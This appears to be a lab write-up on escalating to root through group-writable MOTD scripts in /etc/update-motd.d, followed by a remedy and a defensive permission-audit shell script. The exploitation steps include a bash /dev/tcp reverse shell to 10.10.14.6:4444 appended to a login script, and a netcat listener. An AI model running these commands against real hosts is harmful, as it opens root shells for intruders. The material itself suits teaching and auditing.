Write permission on /etc/update-motd.d/00-header allows us to inject code that is executed every time a user logs in. The script runs as the owner of the SSH service, most likely root.
Identify
1. Check the current permissions of the user
- id
2. Verify the folder and file permissions
- ls -ld /etc/update-motd.d
- ls -lR /etc/update-motd.d/
As we can see, our user is part of the sysadmin group, which has RWX permissions on the directory and its scripts.
Exploitation
1. Modify the file /etc/update-motd.d/00-header, e.g. append a reverse shell
- echo 'bash -c "bash -i >& /dev/tcp/10.10.14.6/4444 0>&1"' >> /etc/update-motd.d/00-header
2. Start a listener on the attacker machine
- nc -lvp 4444
3. Log in again over SSH
- ssh sysadmin@10.10.10.181
4. Check the listener; a reverse shell should have connected back
Remedy
Assign proper permissions to /etc/update-motd.d and the scripts in it: they should be owned by root and writable only by root, never by a group such as sysadmin or by other users.
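An added audit check, not part of the original writeup, that a defender can run to catch this misconfiguration before it is abused. It assumes GNU coreutils stat (-c); the sample directory tree it builds is constructed to stand in for /etc/update-motd.d so the script runs offline.

```shell
#!/bin/sh
# Audit a MOTD script directory (the directory itself and every entry in it).
# Reports anything not owned by the expected owner or writable by group/other,
# since such a script is executed at login by the SSH/PAM stack as root.
# Returns 0 when clean, 1 when at least one finding was printed.
# Assumes GNU coreutils stat. Usage on a real host: audit_motd_dir /etc/update-motd.d
audit_motd_dir() {
    dir="$1"
    expected_owner="${2:-root}"
    findings=0
    for path in "$dir" "$dir"/*; do
        [ -e "$path" ] || continue               # empty directory: glob stays literal
        owner=$(stat -c '%U' "$path")
        mode=$(stat -c '%a' "$path")             # e.g. 775 or 2775 (setgid)
        perms=$(printf '%s' "$mode" | tail -c 3) # keep only user/group/other digits
        group_digit=$(printf '%s' "$perms" | cut -c2)
        other_digit=$(printf '%s' "$perms" | cut -c3)
        if [ "$owner" != "$expected_owner" ]; then
            echo "OWNER    $path owned by $owner, expected $expected_owner"
            findings=$((findings + 1))
        fi
        # write bit is value 2 in each octal permission digit
        if [ $((group_digit & 2)) -ne 0 ] || [ $((other_digit & 2)) -ne 0 ]; then
            echo "WRITABLE $path mode $mode: group/other can modify a login-time script"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample tree (not a real /etc/update-motd.d), owned by the current
# user, so the expected owner is passed explicitly instead of the default root.
sample=$(mktemp -d)
mkdir "$sample/motd.d"
printf '#!/bin/sh\nuname -a\n' > "$sample/motd.d/00-header"
printf '#!/bin/sh\nuptime\n'   > "$sample/motd.d/10-uptime"
chmod 755 "$sample/motd.d"
chmod 775 "$sample/motd.d/00-header"   # group-writable: the weakness from the writeup
chmod 644 "$sample/motd.d/10-uptime"

audit_motd_dir "$sample/motd.d" "$(id -un)" || echo "findings present: fix ownership/permissions"
```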